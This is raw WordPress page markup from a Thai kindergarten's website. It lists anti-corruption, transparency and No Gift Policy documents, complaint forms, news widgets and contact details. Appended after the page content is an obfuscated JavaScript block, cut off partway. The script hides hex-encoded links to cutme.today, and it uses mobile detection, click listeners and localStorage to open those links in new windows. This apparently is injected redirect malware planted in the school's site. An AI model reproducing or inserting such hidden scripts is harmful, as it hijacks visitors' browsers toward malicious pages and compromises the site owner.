900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( 